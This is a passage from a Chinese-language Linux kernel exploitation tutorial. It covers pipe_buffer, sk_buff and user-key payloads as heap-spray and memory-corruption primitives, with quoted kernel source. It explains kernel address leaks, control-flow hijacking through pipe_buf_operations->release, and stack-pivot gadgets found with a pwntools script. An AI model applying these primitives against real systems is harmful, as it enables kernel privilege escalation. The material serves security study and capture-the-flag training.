watch_queue_clear(pipe->watch_queue);
put_watch_queue(pipe->watch_queue);
}
#endif

(void) account_pipe_buffers(pipe->user, pipe->nr_accounted, 0);
free_uid(pipe->user);
for (i = 0; i < pipe->ring_size; i++) {
struct pipe_buffer *buf = pipe->bufs + i;
if (buf->ops)
pipe_buf_release(pipe, buf);
}
if (pipe->tmp_page)
__free_page(pipe->tmp_page);
kfree(pipe->bufs);
kfree(pipe);
}

内存页的分配和释放

pipe_bufferpage 指针指向一个 page 结构体,而这个 page 结构体对应着一个内存页,这个内存页是 pipe_buffer 用来存取数据的 buffer 。

然而这个内存页不是在创建 pipe_buffer 的时候就分配的,而是在第一次向 pipe_buffer 中写入数据的时候分配。关键代码位于 pipe_write 函数,在检测到 pageNULL 时会向 buddy system 申请一张物理页。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#define alloc_page(gfp_mask) alloc_pages(gfp_mask, 0)

struct pipe_buffer *buf = &pipe->bufs[head & mask];
struct page *page = pipe->tmp_page;
int copied;

if (!page) {
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}
...
buf = &pipe->bufs[head & mask];
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;

pipe_read 函数中如果 pipe_buffer 中的数据全部被读取出来则释放对应内存页。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
static void anon_pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
struct page *page = buf->page;

/*
* If nobody else uses this page, and we don't already have a
* temporary page, let's keep track of it as a one-deep
* allocation cache. (Otherwise just release our reference to it)
*/
if (page_count(page) == 1 && !pipe->tmp_page)
pipe->tmp_page = page;
else
put_page(page);
}

static inline void pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
const struct pipe_buf_operations *ops = buf->ops;

buf->ops = NULL;
ops->release(pipe, buf);
}

if (!buf->len) {
pipe_buf_release(pipe, buf);
spin_lock_irq(&pipe->rd_wait.lock);
tail++;
pipe->tail = tail;
spin_unlock_irq(&pipe->rd_wait.lock);
}

数据读取写入

pipe 负责读取和写入数据的函数为 pipe_readpipe_write

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
static ssize_t
pipe_read(struct kiocb *iocb, struct iov_iter *to)
{
...
for (;;) {
/* Read ->head with a barrier vs post_one_notification() */
unsigned int head = smp_load_acquire(&pipe->head);
unsigned int tail = pipe->tail;
unsigned int mask = pipe->ring_size - 1;
if (!pipe_empty(head, tail)) {
struct pipe_buffer *buf = &pipe->bufs[tail & mask];
size_t chars = buf->len;
size_t written;
int error;
written = copy_page_to_iter(buf->page, buf->offset, chars, to);
if (unlikely(written < chars)) {
if (!ret)
ret = -EFAULT;
break;
}
ret += chars;
buf->offset += chars;
buf->len -= chars;
if (!buf->len) {
pipe_buf_release(pipe, buf);
spin_lock_irq(&pipe->rd_wait.lock);
tail++;
pipe->tail = tail;
spin_unlock_irq(&pipe->rd_wait.lock);
}
total_len -= chars;
if (!total_len)
break; /* common path: read succeeded */
if (!pipe_empty(head, tail)) /* More to do? */
continue;
}
}
...
}

static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
if (chars && !was_empty) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
int offset = buf->offset + buf->len;

if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
ret = copy_page_from_iter(buf->page, offset, chars, from);
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}
buf->len += ret;
}
}
for (;;) {
head = pipe->head;
if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[head & mask];
struct page *page = pipe->tmp_page;
int copied;

if (!page) {
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}

pipe->head = head + 1;

/* Insert it into the buffer array */
buf = &pipe->bufs[head & mask];
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;
pipe->tmp_page = NULL;

copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
if (!ret)
ret = -EFAULT;
break;
}
ret += copied;
buf->offset = 0;
buf->len = copied;
}
}
}

分析代码可知 pipe_inode_info 维护了一个 pipe_buffer 组成的双端队列,结构如下图所示:

具体到每个 pipe_buffer 其中的 offsetlen 标记了 pipe_buffer 对应内存页中的数据。

数据泄露

  • 内核 .text 段地址

    pipe_buffer->pipe_buf_operations 通常指向一张全局函数表,我们可以通过该函数表的地址泄露出内核 .text 段基址(通常为 anon_pipe_buf_ops)。

劫持内核执行流

当我们关闭了管道的两端时,会触发 pipe_buffer->pipe_buffer_operations->release 这一指针。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
bool (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
bool (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

存在如下调用链:

1
2
3
4
5
pipe_release()
put_pipe_info()
free_pipe_info()
pipe_buf_release()
pipe_buffer->pipe_buf_operations->release() // it should be anon_pipe_buf_release()

pipe_buf_release() 中会调用到该 pipe_buffer 的函数表中的 release 指针:

1
2
3
4
5
6
7
8
9
10
11
12
13
/**
* pipe_buf_release - put a reference to a pipe_buffer
* @pipe: the pipe that the buffer belongs to
* @buf: the buffer to put a reference to
*/
static inline void pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
const struct pipe_buf_operations *ops = buf->ops;

buf->ops = NULL;
ops->release(pipe, buf);
}

因此我们只需要劫持其函数表到可控区域后再关闭管道的两端便能劫持内核执行流。当执行到该指针时 rsi 寄存器刚好指向对应的 pipe_buffer,因此我们可以将函数表劫持到 pipe_buffer 上,找到一条合适的 gadget 将栈迁移到该处,从而更顺利地完成 ROP。

常用 gadget 如下:

1
2
3
4
5
6
7
8
9
10
11
.text:FFFFFFFF81250C9D push    rsi
.text:FFFFFFFF81250C9E pop rsp
.text:FFFFFFFF81250C9F cmp rcx, rdx
.text:FFFFFFFF81250CA2 jb short loc_FFFFFFFF81250C85
.text:FFFFFFFF81250CA4 pop rbx
.text:FFFFFFFF81250CA5 xor eax, eax
.text:FFFFFFFF81250CA7 pop rbp
.text:FFFFFFFF81250CA8 pop r12
.text:FFFFFFFF81250CAA jmp __x86_return_thunk
...
.text:FFFFFFFF82003240 retn
1
2
3
4
5
6
7
8
9
10
11
.text:FFFFFFFF817AD641 push    rsi
.text:FFFFFFFF817AD642 pop rsp
.text:FFFFFFFF817AD643 xor eax, eax
.text:FFFFFFFF817AD645 test edx, edx
.text:FFFFFFFF817AD647 jnz short locret_FFFFFFFF817AD650
.text:FFFFFFFF817AD647
.text:FFFFFFFF817AD649 mov rax, [rsi+90h]
.text:FFFFFFFF817AD649
.text:FFFFFFFF817AD650
.text:FFFFFFFF817AD650 locret_FFFFFFFF817AD650: ; CODE XREF: .text:FFFFFFFF817AD647↑j
.text:FFFFFFFF817AD650 retn

调试时发现 edx = 0 因此也有下面这条 gadget 。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
.text:FFFFFFFF8120B854 push    rsi
.text:FFFFFFFF8120B855 pop rsp
.text:FFFFFFFF8120B856 test edx, edx
.text:FFFFFFFF8120B858 jle loc_FFFFFFFF8120B8FB
...
.text:FFFFFFFF8120B8FB ud2
.text:FFFFFFFF8120B8FD mov eax, 0FFFFFFEAh
.text:FFFFFFFF8120B902 jmp short loc_FFFFFFFF8120B89F
...
.text:FFFFFFFF8120B89F pop rbx
.text:FFFFFFFF8120B8A0 pop rbp
.text:FFFFFFFF8120B8A1 pop r12
.text:FFFFFFFF8120B8A3 jmp __x86_return_thunk
...
.text:FFFFFFFF82003240 retn

可以通过 pwntools 查找。

1
2
3
4
5
6
from pwn import *
context(arch = 'amd64', os = 'linux')
elf = ELF('vmlinux')
for x in elf.search(asm('push rsi; pop rsp;'), executable = True):
print elf.disasm(address = x, n_bytes = 0x40)
print

任意大小对象分配

pipe_buffer 的分配过程,其实际上是单次分配 pipe_bufspipe_buffer 结构体:

1
2
3
4
5
6
struct pipe_inode_info *alloc_pipe_info(void)
{
//...

pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);

这里注意到 pipe_bufs 不是一个常量而是一个变量,pipe 系统调用提供了 F_SETPIPE_SZ 让我们可以重新分配 pipe_buffer 并指定其数量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
{
struct pipe_buffer *bufs;

bufs = kcalloc(nr_slots, sizeof(*bufs),
GFP_KERNEL_ACCOUNT | __GFP_NOWARN);
...
}

unsigned int round_pipe_size(unsigned long size)
{
if (size > (1U << 31))
return 0;

/* Minimum pipe size, as required by POSIX */
if (size < PAGE_SIZE)
return PAGE_SIZE;

return roundup_pow_of_two(size);
}

static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg)
{
size = round_pipe_size(arg);
nr_slots = size >> PAGE_SHIFT;
...
ret = pipe_resize_ring(pipe, nr_slots);
}

long pipe_fcntl(struct file *file, unsigned int cmd, unsigned long arg)
{
struct pipe_inode_info *pipe;
long ret;

pipe = get_pipe_info(file, false);
if (!pipe)
return -EBADF;

__pipe_lock(pipe);

switch (cmd) {
case F_SETPIPE_SZ:
ret = pipe_set_size(pipe, arg);
break;
...
}
...
}

根据代码分析可知,pipe_fcntl 传入参数为 nn 时最终在 pipe_resize_ring 函数中 kcalloc 申请的内存大小为:

2log2n212×sizeof(struct pipe_buffer) \left \lfloor\frac{2^{\left \lceil \log_2n \right \rceil }}{2^{12}}\right \rfloor \times \text{sizeof(struct pipe\_buffer)}

pipe_resize_ring 函数的具体实现如下:

首先申请指定大小的内存:

1
2
3
4
5
6
struct pipe_buffer *bufs;
...
bufs = kcalloc(nr_slots, sizeof(*bufs),
GFP_KERNEL_ACCOUNT | __GFP_NOWARN);
if (unlikely(!bufs))
return -ENOMEM;

检查新的大小是否小于当前 pipe_buffer 存放的内容,如果小于则更新 pipe_buffer 数量失败,释放申请的内存。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/**
* pipe_occupancy - Return number of slots used in the pipe
* @head: The pipe ring head pointer
* @tail: The pipe ring tail pointer
*/
static inline unsigned int pipe_occupancy(unsigned int head, unsigned int tail)
{
return head - tail;
}

mask = pipe->ring_size - 1;
head = pipe->head;
tail = pipe->tail;

n = pipe_occupancy(head, tail);
if (nr_slots < n) {
spin_unlock_irq(&pipe->rd_wait.lock);
kfree(bufs);
return -EBUSY;
}

将原有的 pipe_buffer 的内容复制到新的 pipe_buffer 中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/*
* The pipe array wraps around, so just start the new one at zero
* and adjust the indices.
*/
if (n > 0) {
unsigned int h = head & mask;
unsigned int t = tail & mask;
if (h > t) {
memcpy(bufs, pipe->bufs + t,
n * sizeof(struct pipe_buffer));
} else {
unsigned int tsize = pipe->ring_size - t;
if (h > 0)
memcpy(bufs + tsize, pipe->bufs,
h * sizeof(struct pipe_buffer));
memcpy(bufs, pipe->bufs + t,
tsize * sizeof(struct pipe_buffer));
}
}

更新 pipe_buffer

1
2
3
4
5
6
7
8
9
10
head = n;
tail = 0;

kfree(pipe->bufs);
pipe->bufs = bufs;
pipe->ring_size = nr_slots;
if (pipe->max_usage > nr_slots)
pipe->max_usage = nr_slots;
pipe->tail = tail;
pipe->head = head;

任意地址读写

根据 pipe_buffer 读写数据的原理我们不难想到可以通过修改 pipe_buffer 中的 page 指针指向指定的 page 结构体并且修改 offsetlen 就可以读写该 page 结构体中对应的内存页中的数据。

由于 vmemmap_base 指向的 page 数组与线性映射区的内存页的是线性映射的关系,因此在已知一个线性映射区的地址就可以读写该地址对应的数据。

至于非线性映射区的地址,我们可以先扫描线性映射区查找到进程的 task_struct 进而获取 pgd ,然后通过解析页表获取到该地址对应的物理地址,由于物理地址与线性映射区地址也是线性映射的关系,因此我们可以得到线性映射区中的地址,从而读写该地址对应的内存。

sk_buff:内核中的“大对象菜单堆”

sk_buff:size >= 512 的对象分配

sk_buff 是 Linux kernel 网络协议栈中一个重要的基础结构体,其用以表示在网络协议栈中传输的一个「包」,但其结构体本身不包含一个包的数据部分,而是包含该包的各种属性,数据包的本体数据则使用一个单独的 object 储存

这个结构体成员比较多,我们主要关注核心部分

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
struct sk_buff {
union {
struct {
/* These two members must be first. */
struct sk_buff *next;
struct sk_buff *prev;

// ...
};

// ...

/* These elements must be at the end, see alloc_skb() for details. */
sk_buff_data_t tail;
sk_buff_data_t end;
unsigned char *head,
*data;
unsigned int truesize;
refcount_t users;

#ifdef CONFIG_SKB_EXTENSIONS
/* only useable after checking ->active_extensions != 0 */
struct skb_ext *extensions;
#endif
};

sk_buff 结构体与其所表示的数据包形成如下结构,其中:

  • head :一个数据包实际的起始处(也就是为该数据包分配的 object 的首地址)
  • end :一个数据包实际的末尾(为该数据包分配的 object 的末尾地址)
  • data当前所在 layer 的数据包对应的起始地址
  • tail当前所在 layer 的数据包对应的末尾地址

data 和 tail 可以这么理解:数据包每经过网络层次模型中的一层都会被添加/删除一个 header (有时还有一个 tail),data 与 tail 便是用以对此进行标识的。多个 sk_buff 之间形成双向链表结构,类似于 msg_queue,这里同样有一个 sk_buff_head 结构作为哨兵节点。

分配(数据包:__GFP_NOMEMALLOC | __GFP_NOWARN)

在内核网络协议栈中很多地方都会用到该结构体,例如读写 socket 一类的操作都会造成包的创建,其最终都会调用到 alloc_skb() 来分配该结构体,而这个函数又是 __alloc_skb() 的 wrapper,不过需要注意的是其会从独立的 skbuff_fclone_cache / skbuff_head_cache 取 object。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
struct sk_buff *__alloc_skb(unsigned int size, gfp_t gfp_mask,
int flags, int node)
{
struct kmem_cache *cache;
struct sk_buff *skb;
u8 *data;
bool pfmemalloc;

cache = (flags & SKB_ALLOC_FCLONE)
? skbuff_fclone_cache : skbuff_head_cache;

if (sk_memalloc_socks() && (flags & SKB_ALLOC_RX))
gfp_mask |= __GFP_MEMALLOC;

/* Get the HEAD */
if ((flags & (SKB_ALLOC_FCLONE | SKB_ALLOC_NAPI)) == SKB_ALLOC_NAPI &&
likely(node == NUMA_NO_NODE || node == numa_mem_id()))
skb = napi_skb_cache_get();
else
skb = kmem_cache_alloc_node(cache, gfp_mask & ~GFP_DMA, node);
if (unlikely(!skb))
return NULL;
prefetchw(skb);

/* We do our best to align skb_shared_info on a separate cache
* line. It usually works because kmalloc(X > SMP_CACHE_BYTES) gives
* aligned memory blocks, unless SLUB/SLAB debug is enabled.
* Both skb->head and skb_shared_info are cache line aligned.
*/
size = SKB_DATA_ALIGN(size);
size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
data = kmalloc_reserve(size, gfp_mask, node, &pfmemalloc);
//...

sk_buff 虽然是从独立的 kmem_cache 中分配的,但其对应的数据包不是,我们在这里注意到分配数据包时使用的是 kmalloc_reserve(),最终会调用到 __kmalloc_node_track_caller()走常规的 kmalloc 分配路径,因此我们仍然可以实现近乎任意大小 object 的分配与释放。

因此 sk_buffmsg_msg 一样常被用来完成堆喷的工作,不同的是 msg_msg 带了一个 header,而 sk_buff 的数据包则带一个 tail——skb_shared_info 结构体。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
struct skb_shared_info {
__u8 flags;
__u8 meta_len;
__u8 nr_frags;
__u8 tx_flags;
unsigned short gso_size;
/* Warning: this field is not always filled in (UFO)! */
unsigned short gso_segs;
struct sk_buff *frag_list;
struct skb_shared_hwtstamps hwtstamps;
unsigned int gso_type;
u32 tskey;

/*
* Warning : all fields before dataref are cleared in __alloc_skb()
*/
atomic_t dataref;

/* Intermediate layers must ensure that destructor_arg
* remains valid until skb destructor */
void * destructor_arg;

/* must be last field, see pskb_expand_head() */
skb_frag_t frags[MAX_SKB_FRAGS];
};

skb_shared_info 结构体的大小为 320 字节,这意味着我们能够利用分配的 object 最小的大小也得是 512 字节,这无疑为我们的利用增添了几分难度,但不可否认的是 sk_buff 仍为我们提供了较大对象的任意分配写入与释放。

提示

为数据包分配的内存是从 kmalloc-xx 而不是从 kmalloc-cg- 中申请的。

释放

我们只需要沿着发送的路径接收该包就能将其释放掉,例如若是我们通过向套接字中写入数据创建了一个包,则从套接字中读出该包便能将其释放

在内核中调用的是 kfree_skb() 函数进行释放,对于数据,其最终会调用到 skb_release_data() ,在这其中调用到 skb_free_head() 进行释放:

1
2
3
4
5
6
7
8
9
10
11
12
static void skb_free_head(struct sk_buff *skb)
{
unsigned char *head = skb->head;

if (skb->head_frag) {
if (skb_pp_recycle(skb, head))
return;
skb_free_frag(head);
} else {
kfree(head);
}
}

sk_buff 本身则通过 kfree_skbmem() 进行释放,主要就是直接放入对应的 kmem_cache 中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
/*
* Free an skbuff by memory without cleaning the state.
*/
static void kfree_skbmem(struct sk_buff *skb)
{
struct sk_buff_fclones *fclones;

switch (skb->fclone) {
case SKB_FCLONE_UNAVAILABLE:
kmem_cache_free(skbuff_head_cache, skb);
return;

case SKB_FCLONE_ORIG:
fclones = container_of(skb, struct sk_buff_fclones, skb1);

/* We usually free the clone (TX completion) before original skb
* This test would have no chance to be true for the clone,
* while here, branch prediction will be good.
*/
if (refcount_read(&fclones->fclone_ref) == 1)
goto fastpath;
break;

default: /* SKB_FCLONE_CLONE */
fclones = container_of(skb, struct sk_buff_fclones, skb2);
break;
}
if (!refcount_dec_and_test(&fclones->fclone_ref))
return;
fastpath:
kmem_cache_free(skbuff_fclone_cache, fclones);
}

从这里我们也可以看出 sk_buff 结构体也为我们提供了一个简陋的“菜单堆”功能,比较朴素的利用方式就是利用 socketpair 系统调用创建一对套接字,往其中一端写入以完成发包,从另一端读出以完成收包。

内核密钥管理:内核中的“菜单堆”

自 Linux 2.6 起内核引入了 密钥保留服务key retention service),用以在内核空间存储密钥以供其他服务使用,并提供了用以在用户空间操作密钥的三个新的系统调用,我们这里仅关注 type 为 "user" 的密钥

add_key - 创建带描述密钥(GFP_KERNEL | __GFP_HARDWALL | __GFP_NOWARN)

add_key() 系统调用用以创建或更新带有给定 typedescription 的密钥,并以长为 plenpayload 以实例化,之后将其挂到指定的 keyring 上并返回一个代表密钥的序列号:

1
2
3
4
5
6
#include <sys/types.h>
#include <keyutils.h>

key_serial_t add_key(const char *type, const char *description,
const void *payload, size_t plen,
key_serial_t keyring);

这里我们主要关注这个功能如何被利用在 kernel pwn 当中,这里先给 pwner 视角下该函数的简要流程:

  • 首先会在内核空间中分配 obj1 与 obj2,分配 flag 为 GFP_KERNEL,用以保存 description (字符串,最大大小为 4096)、payload (普通数据,大小无限制)
  • 分配 obj3 保存 description ,分配 obj4 保存 payload,分配 flag 皆为 GFP_KERNEL
  • 释放 obj1 与 obj2,返回密钥 id

现在我们来看具体过程,在 add_key() 系统调用中其会为 decriptionpayload 都分配对应大小的对象,并将数据拷贝到内核空间当中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
SYSCALL_DEFINE5(add_key, const char __user *, _type,
const char __user *, _description,
const void __user *, _payload,
size_t, plen,
key_serial_t, ringid)
{
...
if (_description) {
// 为 decription 分配对象并将数据拷贝到内核空间当中
description = strndup_user(_description, KEY_MAX_DESC_SIZE);
...
}
...
if (plen) {
ret = -ENOMEM;
// 为 payload 分配对象
payload = kvmalloc(plen, GFP_KERNEL);
if (!payload)
goto error2;

ret = -EFAULT;
// 将 payload 数据拷贝到内核空间当中
if (copy_from_user(payload, _payload, plen) != 0)
goto error3;
}
// 再次为 decription 和 payload 分配对象
key_ref = key_create_or_update(keyring_ref, type, description,
payload, plen, KEY_PERM_UNDEF,
KEY_ALLOC_IN_QUOTA);
...
error3:
if (payload) {
memzero_explicit(payload, plen);
// 释放第一次分配的 payload
kvfree(payload);
}
error2:
// 释放第一次分配的 description
kfree(description);
error:
return ret;
}

提示

这个函数的真实名称是 __x64_sys_add_key ,我们在调试的时候应该按照这个真实名称下断点。

拷贝 description 使用的是 strndup_user() ,可以看作 kmalloc() + strcpy() 的结合体,并限制了最大长度为 KEY_MAX_DESC_SIZE(4096),其核心是使用 memdup_user() 进行对象的分配与拷贝,使用的分配 flag 为 GFP_USER | __GFP_NOWARN,而 GFP_USER 其实等价于 GFP_KERNEL | __GFP_HARDWALL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
void *memdup_user(const void __user *src, size_t len)
{
void *p;

p = kmalloc_track_caller(len, GFP_USER | __GFP_NOWARN);
if (!p)
return ERR_PTR(-ENOMEM);

if (copy_from_user(p, src, len)) {
kfree(p);
return ERR_PTR(-EFAULT);
}

return p;
}
EXPORT_SYMBOL(memdup_user);

而 payload 的拷贝则更简单,直接使用 kvmalloc(plen, GFP_KERNEL) 分配 plen 大小的对象后使用 copy_from_user() 进行拷贝。

不过这两个对象都为临时对象,类似于 setxattr ,在 add_key() 系统调用结束时这两个用来存储数据的临时对象便会被释放掉。

但是实际上在 add_key() 调用的 key_create_or_update() 中还会进行第二次对象分配。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
key_ref_t key_create_or_update(key_ref_t keyring_ref,
const char *type,
const char *description,
const void *payload,
size_t plen,
key_perm_t perm,
unsigned long flags)
{
struct keyring_index_key index_key = {
.description = description,
};
struct key_preparsed_payload prep;
...
memset(&prep, 0, sizeof(prep));
prep.data = payload;
prep.datalen = plen;
prep.quotalen = index_key.type->def_datalen;
prep.expiry = TIME64_MAX;
if (index_key.type->preparse) {
// 再次为 payload 分配对象
ret = index_key.type->preparse(&prep);
...
}
...
// 为 key 分配对象并再次为 description 分配对象
key = key_alloc(index_key.type, index_key.description,
cred->fsuid, cred->fsgid, cred, perm, flags, NULL);
...
// user_key_payload 存储到 key
ret = __key_instantiate_and_link(key, &prep, keyring, NULL, &edit);
}

注意

这里会关于 description 去重,也就是说如果我们申请了两个 description 相同的 key,则后一个 key 的申请会导致前一个 key 的 payload 释放。

这里的 index_key.type 根据我们传进来的 type 参数决定,对于 "user" 而言该函数表应当为 key_type_user

1
2
3
4
5
6
7
8
9
10
11
struct key_type key_type_user = {
.name = "user",
.preparse = user_preparse,
.free_preparse = user_free_preparse,
.instantiate = generic_key_instantiate,
.update = user_update,
.revoke = user_revoke,
.destroy = user_destroy,
.describe = user_describe,
.read = user_read,
};

因此被调用的函数为 user_preparse ,其会为我们的 payload 再分配一个带有一个 user_key_payload 结构体作为头部的对象来保存我们传入的 payload ,分配 flag 为 GFP_KERNEL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int user_preparse(struct key_preparsed_payload *prep)
{
struct user_key_payload *upayload;
size_t datalen = prep->datalen;

if (datalen <= 0 || datalen > 32767 || !prep->data)
return -EINVAL;

upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL);
if (!upayload)
return -ENOMEM;

/* attach the data */
prep->quotalen = datalen;
prep->payload.data[0] = upayload;
upayload->datalen = datalen;
memcpy(upayload->data, prep->data, datalen);
return 0;
}

user_key_payload 的定义如下:

1
2
3
4
5
struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[] __aligned(__alignof__(u64)); /* actual data */
};

其中 rcu_head 的定义如下,即 user_key_payload 带有一个长度为 0x18 的 header:

1
2
3
4
5
struct callback_head {
struct callback_head *next;
void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head

key_alloc() 当中存在如下逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
struct key *key_alloc(struct key_type *type, const char *desc,
kuid_t uid, kgid_t gid, const struct cred *cred,
key_perm_t perm, unsigned long flags,
struct key_restriction *restrict_link)
{
//...

desclen = strlen(desc);
quotalen = desclen + 1 + type->def_datalen;

//...

/* allocate and initialise the key and its description */
key = kmem_cache_zalloc(key_jar, GFP_KERNEL);
if (!key)
goto no_memory_2;

key->index_key.desc_len = desclen;
key->index_key.description = kmemdup(desc, desclen + 1, GFP_KERNEL);

在该函数中会完成代表单个密钥的 key 结构体与 description 空间的分配,其中 key 结构体来自独立的 key_jar,这里我们暂且不关注,而 description 的空间则使用 kmemdup() 进行分配,该函数本质上等于 slab_alloc_node() + memcpy(),可以直接理解为使用 kmalloc(size, GFP_KERNEL) 分配了一个内核对象并写入了一个字符串 description

后存在如下调用链将 user_key_payload 存储到 key 中:

1
2
3
4
sys_add_key()
key_create_or_update()
__key_instantiate_and_link()
key->type->instantiate(key, prep) // 对于 type "user" 而言为 generic_key_instantiate()

数据泄露

  • 内核 .text 段地址

    user_key_payload 的 header 中带有一个函数指针,对于 type 为 "user" 的 key 而言在 payload 被释放时该指针会被赋值 user_free_payload_rcu(),因此我们可以通过释放掉一段 payload 后再通过其他方法读取 payload 内容的方式(例如通过其他的 payload 进行越界读取)来泄露内核 .text 段地址

    但是有的版本内核的 user_key_payload 释放前会清空内存导致无法泄露内核基址。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    static inline void memzero_explicit(void *s, size_t count)
    {
    memset(s, 0, count);
    barrier_data(s);
    }


    void kfree_sensitive(const void *p)
    {
    size_t ks;
    void *mem = (void *)p;

    ks = ksize(mem);
    if (ks)
    memzero_explicit(mem, ks);
    kfree(mem);
    }
  • 内核”堆“上地址

    通过 header中的 next 指针泄露

keyctl - 密钥管理:“菜单堆”操作

keyctl() 系统调用为我们提供了对内核中密钥的管理,其核心主要是一个巨大的 switch,类似于 ioctl,根据我们传入的不同的 option 进行不同的操作,我们主要关注以下几个:

KEYCTL_REVOKE - 释放 payload

该选项对应调用的是 keyctl_revoke_key(),其中会调用到 key_revoke(),其中会调用 key->type->revoke(key),对于 type 为 "user" 的 key 而言最后调用到 user_revoke()

1
2
3
4
5
6
7
8
9
10
11
12
void user_revoke(struct key *key)
{
struct user_key_payload *upayload = user_key_payload_locked(key);

/* clear the quota */
key_payload_reserve(key, 0);

if (upayload) {
rcu_assign_keypointer(key, NULL);
call_rcu(&upayload->rcu, user_free_payload_rcu);
}
}

这里会通过 call_rcu() 调用到 user_free_payload_rcu(),将 payload 释放掉:

1
2
3
4
5
6
7
static void user_free_payload_rcu(struct rcu_head *head)
{
struct user_key_payload *payload;

payload = container_of(head, struct user_key_payload, rcu);
kfree_sensitive(payload);
}

KEYCTL_UPDATE - 更新 payload 内容

该选项会调用到 keyctl_update_key(),首先会分配一个临时对象从用户空间拷贝数据,之后调用 key_update() 更新 payload,最后释放掉临时对象:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
long keyctl_update_key(key_serial_t id,
const void __user *_payload,
size_t plen)
{
key_ref_t key_ref;
void *payload;
long ret;

ret = -EINVAL;
if (plen > PAGE_SIZE)
goto error;

/* pull the payload in if one was supplied */
payload = NULL;
if (plen) {
ret = -ENOMEM;
payload = kvmalloc(plen, GFP_KERNEL);
if (!payload)
goto error;

ret = -EFAULT;
if (copy_from_user(payload, _payload, plen) != 0)
goto error2;
}

/* find the target key (which must be writable) */
key_ref = lookup_user_key(id, 0, KEY_NEED_WRITE);
if (IS_ERR(key_ref)) {
ret = PTR_ERR(key_ref);
goto error2;
}

/* update the key */
ret = key_update(key_ref, payload, plen);

key_ref_put(key_ref);
error2:
kvfree_sensitive(payload, plen);
error:
